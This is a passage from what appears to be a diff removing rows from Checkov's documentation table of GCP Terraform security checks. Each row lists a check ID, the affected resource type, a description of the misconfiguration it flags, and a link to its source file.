-| 2190 | CKV_GCP_35 | resource | google_compute_instance_template | Ensure 'Enable connecting to serial ports' is not enabled for VM Instance | Terraform | [GoogleComputeSerialPorts.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeSerialPorts.py) |
-| 2191 | CKV_GCP_36 | resource | google_compute_instance | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
-| 2192 | CKV_GCP_36 | resource | google_compute_instance_from_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
-| 2193 | CKV_GCP_36 | resource | google_compute_instance_template | Ensure that IP forwarding is not enabled on Instances | Terraform | [GoogleComputeIPForward.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeIPForward.py) |
-| 2194 | CKV_GCP_37 | resource | google_compute_disk | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeDiskEncryption.py) |
-| 2195 | CKV_GCP_38 | resource | google_compute_instance | Ensure VM disks for critical VMs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [GoogleComputeBootDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeBootDiskEncryption.py) |
-| 2196 | CKV_GCP_39 | resource | google_compute_instance | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
-| 2197 | CKV_GCP_39 | resource | google_compute_instance_from_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
-| 2198 | CKV_GCP_39 | resource | google_compute_instance_template | Ensure Compute instances are launched with Shielded VM enabled | Terraform | [GoogleComputeShieldedVM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeShieldedVM.py) |
-| 2199 | CKV_GCP_40 | resource | google_compute_instance | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
-| 2200 | CKV_GCP_40 | resource | google_compute_instance_from_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
-| 2201 | CKV_GCP_40 | resource | google_compute_instance_template | Ensure that Compute instances do not have public IP addresses | Terraform | [GoogleComputeExternalIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeExternalIP.py) |
-| 2202 | CKV_GCP_41 | resource | google_project_iam_binding | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) |
-| 2203 | CKV_GCP_41 | resource | google_project_iam_member | Ensure that IAM users are not assigned the Service Account User or Service Account Token Creator roles at project level | Terraform | [GoogleRoleServiceAccountUser.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleRoleServiceAccountUser.py) |
-| 2204 | CKV_GCP_42 | resource | google_project_iam_member | Ensure that Service Account has no Admin privileges | Terraform | [GoogleProjectAdminServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectAdminServiceAccount.py) |
-| 2205 | CKV_GCP_43 | resource | google_kms_crypto_key | Ensure KMS encryption keys are rotated within a period of 90 days | Terraform | [GoogleKMSRotationPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSRotationPeriod.py) |
-| 2206 | CKV_GCP_44 | resource | google_folder_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) |
-| 2207 | CKV_GCP_44 | resource | google_folder_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at a folder level | Terraform | [GoogleFolderImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderImpersonationRole.py) |
-| 2208 | CKV_GCP_45 | resource | google_organization_iam_binding | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) |
-| 2209 | CKV_GCP_45 | resource | google_organization_iam_member | Ensure no roles that enable to impersonate and manage all service accounts are used at an organization level | Terraform | [GoogleOrgImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgImpersonationRole.py) |
-| 2210 | CKV_GCP_46 | resource | google_project_iam_binding | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) |
-| 2211 | CKV_GCP_46 | resource | google_project_iam_member | Ensure Default Service account is not used at a project level | Terraform | [GoogleProjectMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectMemberDefaultServiceAccount.py) |
-| 2212 | CKV_GCP_47 | resource | google_organization_iam_binding | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) |
-| 2213 | CKV_GCP_47 | resource | google_organization_iam_member | Ensure default service account is not used at an organization level | Terraform | [GoogleOrgMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgMemberDefaultServiceAccount.py) |
-| 2214 | CKV_GCP_48 | resource | google_folder_iam_binding | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) |
-| 2215 | CKV_GCP_48 | resource | google_folder_iam_member | Ensure Default Service account is not used at a folder level | Terraform | [GoogleFolderMemberDefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderMemberDefaultServiceAccount.py) |
-| 2216 | CKV_GCP_49 | resource | google_project_iam_binding | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) |
-| 2217 | CKV_GCP_49 | resource | google_project_iam_member | Ensure roles do not impersonate or manage Service Accounts used at project level | Terraform | [GoogleProjectImpersonationRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectImpersonationRole.py) |
-| 2218 | CKV_GCP_50 | resource | google_sql_database_instance | Ensure MySQL database 'local_infile' flag is set to 'off' | Terraform | [GoogleCloudMySqlLocalInfileOff.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudMySqlLocalInfileOff.py) |
-| 2219 | CKV_GCP_51 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_checkpoints' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogCheckpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogCheckpoints.py) |
-| 2220 | CKV_GCP_52 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_connections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogConnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogConnection.py) |
-| 2221 | CKV_GCP_53 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_disconnections' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogDisconnection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogDisconnection.py) |
-| 2222 | CKV_GCP_54 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_lock_waits' flag is set to 'on' | Terraform | [GoogleCloudPostgreSqlLogLockWaits.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogLockWaits.py) |
-| 2223 | CKV_GCP_55 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_messages' flag is set to a valid value | Terraform | [GoogleCloudPostgreSqlLogMinMessage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinMessage.py) |
-| 2224 | CKV_GCP_56 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_temp_files flag is set to '0' | Terraform | [GoogleCloudPostgreSqlLogTemp.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogTemp.py) |
-| 2225 | CKV_GCP_57 | resource | google_sql_database_instance | Ensure PostgreSQL database 'log_min_duration_statement' flag is set to '-1' | Terraform | [GoogleCloudPostgreSqlLogMinDuration.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinDuration.py) |
-| 2226 | CKV_GCP_58 | resource | google_sql_database_instance | Ensure SQL database 'cross db ownership chaining' flag is set to 'off' | Terraform | [GoogleCloudSqlServerCrossDBOwnershipChaining.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerCrossDBOwnershipChaining.py) |
-| 2227 | CKV_GCP_59 | resource | google_sql_database_instance | Ensure SQL database 'contained database authentication' flag is set to 'off' | Terraform | [GoogleCloudSqlServerContainedDBAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerContainedDBAuthentication.py) |
-| 2228 | CKV_GCP_60 | resource | google_sql_database_instance | Ensure Cloud SQL database does not have public IP | Terraform | [GoogleCloudSqlServerNoPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudSqlServerNoPublicIP.py) |
-| 2229 | CKV_GCP_61 | resource | google_container_cluster | Enable VPC Flow Logs and Intranode Visibility | Terraform | [GKEEnableVPCFlowLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableVPCFlowLogs.py) |
-| 2230 | CKV_GCP_62 | resource | google_storage_bucket | Bucket should log access | Terraform | [CloudStorageLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageLogging.py) |
-| 2231 | CKV_GCP_63 | resource | google_storage_bucket | Bucket should not log to itself | Terraform | [CloudStorageSelfLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageSelfLogging.py) |
-| 2232 | CKV_GCP_64 | resource | google_container_cluster | Ensure clusters are created with Private Nodes | Terraform | [GKEPrivateNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEPrivateNodes.py) |
-| 2233 | CKV_GCP_65 | resource | google_container_cluster | Manage Kubernetes RBAC users with Google Groups for GKE | Terraform | [GKEKubernetesRBACGoogleGroups.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEKubernetesRBACGoogleGroups.py) |
-| 2234 | CKV_GCP_66 | resource | google_container_cluster | Ensure use of Binary Authorization | Terraform | [GKEBinaryAuthorization.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEBinaryAuthorization.py) |
-| 2235 | CKV_GCP_68 | resource | google_container_cluster | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) |
-| 2236 | CKV_GCP_68 | resource | google_container_node_pool | Ensure Secure Boot for Shielded GKE Nodes is Enabled | Terraform | [GKESecureBootforShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKESecureBootforShieldedNodes.py) |
-| 2237 | CKV_GCP_69 | resource | google_container_cluster | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) |
-| 2238 | CKV_GCP_69 | resource | google_container_node_pool | Ensure the GKE Metadata Server is Enabled | Terraform | [GKEMetadataServerIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEMetadataServerIsEnabled.py) |
-| 2239 | CKV_GCP_70 | resource | google_container_cluster | Ensure the GKE Release Channel is set | Terraform | [GKEReleaseChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEReleaseChannel.py) |
-| 2240 | CKV_GCP_71 | resource | google_container_cluster | Ensure Shielded GKE Nodes are Enabled | Terraform | [GKEEnableShieldedNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnableShieldedNodes.py) |
-| 2241 | CKV_GCP_72 | resource | google_container_cluster | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
-| 2242 | CKV_GCP_72 | resource | google_container_node_pool | Ensure Integrity Monitoring for Shielded GKE Nodes is Enabled | Terraform | [GKEEnsureIntegrityMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEEnsureIntegrityMonitoring.py) |
-| 2243 | CKV_GCP_73 | resource | google_compute_security_policy | Ensure Cloud Armor prevents message lookup in Log4j2.
See CVE-2021-44228 aka log4jshell | Terraform | [CloudArmorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudArmorWAFACLCVE202144228.py) | -| 2244 | CKV_GCP_74 | resource | google_compute_subnetwork | Ensure that private_ip_google_access is enabled for Subnet | Terraform | [GoogleSubnetworkPrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkPrivateGoogleEnabled.py) | -| 2245 | CKV_GCP_75 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted FTP access | Terraform | [GoogleComputeFirewallUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress21.py) | -| 2246 | CKV_GCP_76 | resource | google_compute_subnetwork | Ensure that Private google access is enabled for IPV6 | Terraform | [GoogleSubnetworkIPV6PrivateGoogleEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleSubnetworkIPV6PrivateGoogleEnabled.py) | -| 2247 | CKV_GCP_77 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow on ftp port | Terraform | [GoogleComputeFirewallUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress20.py) | -| 2248 | CKV_GCP_78 | resource | google_storage_bucket | Ensure Cloud storage has versioning enabled | Terraform | [CloudStorageVersioningEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudStorageVersioningEnabled.py) | -| 2249 | CKV_GCP_79 | resource | google_sql_database_instance | Ensure SQL database is using latest Major version | Terraform | 
[CloudSqlMajorVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudSqlMajorVersion.py) | -| 2250 | CKV_GCP_80 | resource | google_bigquery_table | Ensure Big Query Tables are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryTableEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableEncryptedWithCMK.py) | -| 2251 | CKV_GCP_81 | resource | google_bigquery_dataset | Ensure Big Query Datasets are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [BigQueryDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryDatasetEncryptedWithCMK.py) | -| 2252 | CKV_GCP_82 | resource | google_kms_crypto_key | Ensure KMS keys are protected from deletion | Terraform | [GoogleKMSPreventDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSPreventDestroy.py) | -| 2253 | CKV_GCP_83 | resource | google_pubsub_topic | Ensure PubSub Topics are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [CloudPubSubEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudPubSubEncryptedWithCMK.py) | -| 2254 | CKV_GCP_84 | resource | google_artifact_registry_repository | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py) | -| 2255 | CKV_GCP_85 | resource | google_bigtable_instance | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | 
[BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py) | -| 2256 | CKV_GCP_86 | resource | google_cloudbuild_worker_pool | Ensure Cloud build workers are private | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py) | -| 2257 | CKV_GCP_87 | resource | google_data_fusion_instance | Ensure Data fusion instances are private | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py) | -| 2258 | CKV_GCP_88 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted mysql access | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py) | -| 2259 | CKV_GCP_89 | resource | google_notebooks_instance | Ensure Vertex AI instances are private | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py) | -| 2260 | CKV_GCP_90 | resource | google_dataflow_job | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py) | -| 2261 | CKV_GCP_91 | resource | google_dataproc_cluster | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py) | -| 2262 | CKV_GCP_92 | resource | google_vertex_ai_dataset 
| Ensure Vertex AI datasets uses a CMK (Customer Managed Key) | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py) | -| 2263 | CKV_GCP_93 | resource | google_spanner_database | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK) | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py) | -| 2264 | CKV_GCP_94 | resource | google_dataflow_job | Ensure Dataflow jobs are private | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py) | -| 2265 | CKV_GCP_95 | resource | google_redis_instance | Ensure Memorystore for Redis has AUTH enabled | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py) | -| 2266 | CKV_GCP_96 | resource | google_vertex_ai_metadata_store | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key) | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py) | -| 2267 | CKV_GCP_97 | resource | google_redis_instance | Ensure Memorystore for Redis uses intransit encryption | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py) | -| 2268 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_binding | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | 
[DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 2269 | CKV_GCP_98 | resource | google_dataproc_cluster_iam_member | Ensure that Dataproc clusters are not anonymously or publicly accessible | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py) | -| 2270 | CKV_GCP_99 | resource | google_pubsub_topic_iam_binding | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 2271 | CKV_GCP_99 | resource | google_pubsub_topic_iam_member | Ensure that Pub/Sub Topics are not anonymously or publicly accessible | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py) | -| 2272 | CKV_GCP_100 | resource | google_bigquery_table_iam_binding | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 2273 | CKV_GCP_100 | resource | google_bigquery_table_iam_member | Ensure that BigQuery Tables are not anonymously or publicly accessible | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py) | -| 2274 | CKV_GCP_101 | resource | google_artifact_registry_repository_iam_binding | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 2275 | CKV_GCP_101 | resource | 
google_artifact_registry_repository_iam_member | Ensure that Artifact Registry repositories are not anonymously or publicly accessible | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py) | -| 2276 | CKV_GCP_102 | resource | google_cloud_run_service_iam_binding | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 2277 | CKV_GCP_102 | resource | google_cloud_run_service_iam_member | Ensure that GCP Cloud Run services are not anonymously or publicly accessible | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py) | -| 2278 | CKV_GCP_103 | resource | google_dataproc_cluster | Ensure Dataproc Clusters do not have public IPs | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py) | -| 2279 | CKV_GCP_104 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver logging enabled | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py) | -| 2280 | CKV_GCP_105 | resource | google_data_fusion_instance | Ensure Datafusion has stack driver monitoring enabled | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py) | -| 2281 | CKV_GCP_106 | resource | google_compute_firewall | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access | Terraform | 
[GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py) | -| 2282 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2283 | CKV_GCP_107 | resource | google_cloudfunctions2_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2284 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_binding | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2285 | CKV_GCP_107 | resource | google_cloudfunctions_function_iam_member | Cloud functions should not be public | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py) | -| 2286 | CKV_GCP_108 | resource | google_sql_database_instance | Ensure hostnames are logged for GCP PostgreSQL databases | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py) | -| 2287 | CKV_GCP_109 | resource | google_sql_database_instance | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py) | 
-| 2288 | CKV_GCP_110 | resource | google_sql_database_instance | Ensure pgAudit is enabled for your GCP PostgreSQL database | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py) | -| 2289 | CKV_GCP_111 | resource | google_sql_database_instance | Ensure GCP PostgreSQL logs SQL statements | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py) | -| 2290 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_binding | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2291 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_member | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2292 | CKV_GCP_112 | resource | google_kms_crypto_key_iam_policy | Esnure KMS policy should not allow public access | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py) | -| 2293 | CKV_GCP_113 | data | google_iam_policy | Ensure IAM policy should not define public access | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py) | -| 2294 | CKV_GCP_114 | resource | google_storage_bucket | Ensure public access prevention is enforced on Cloud Storage bucket | Terraform | 